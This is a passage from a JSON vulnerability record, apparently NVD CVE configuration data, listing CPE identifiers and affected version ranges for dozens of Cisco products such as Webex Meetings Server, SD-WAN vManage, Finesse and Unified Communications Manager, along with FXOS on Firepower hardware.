"vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.6\\(1\\)", "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:nexus_dashboard:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.1.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.6.3.1", "versionStartIncluding": "5.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.5.4.1", "versionStartIncluding": "5.5", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.3.5.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.9-361", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.4.5.2", "versionStartIncluding": "5.4", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_spaces\\:_connector:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.5", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.0.3", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:crosswork_platform_infrastructure:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.10.0.1", "versionStartIncluding": "2.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.9.1.3", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.10.0.16", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_workload_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.5.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite_admin:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.3.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_cost_optimizer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.5.2", "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.2.000.009", "versionStartIncluding": "3.2.000.000", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.1.000.044", "versionStartIncluding": "3.1.000.000", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.0.000.115", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:nexus_insights:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:advanced_malware_protection_virtual_private_cloud_appliance:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.4", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:customer_experience_cloud_agent:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.12.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:workload_optimization_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0\\(1p\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_director:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.8.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "20.3.4.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.0", "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.2.3.4", "versionStartIncluding": "2.2.3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "20.4.2.1", "versionStartIncluding": "20.4", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.3.2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "7.3.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.4.4", "versionStartIncluding": "3.4.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "20.5.1.1", "versionStartIncluding": "20.5", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.1.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "20.6.2.1", "versionStartIncluding": "20.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.6.7", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.2.2.8", "versionStartIncluding": "2.2.2.0", "vulnerable": true 
}, { "cpe23Uri": "cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_operations_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "7.14.4", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:virtualized_voice_browser:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:unified_workforce_optimization:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:unified_sip_proxy:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.2.1v2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:unified_intelligence_center:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.6\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.6\\(2\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:session_management:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "14.4.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.0\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.5\\(4\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:contact_center_management_portal:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:contact_center_domain_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cloud_connect:*:*:*:*:*:*:*:*", "cpe_name": 
[], "versionEndExcluding": "12.6\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:broadworks:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2021.11_1.162", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:cisco:firepower_1010:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_1120:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_1140:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_1150:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_2110:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_2120:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_2130:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_2140:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4110:-:*:*:*:*:*:*:*", "cpe_name": [], 
"vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4112:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4115:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4120:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4125:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4140:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4145:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_4150:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:cisco:firepower_9300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 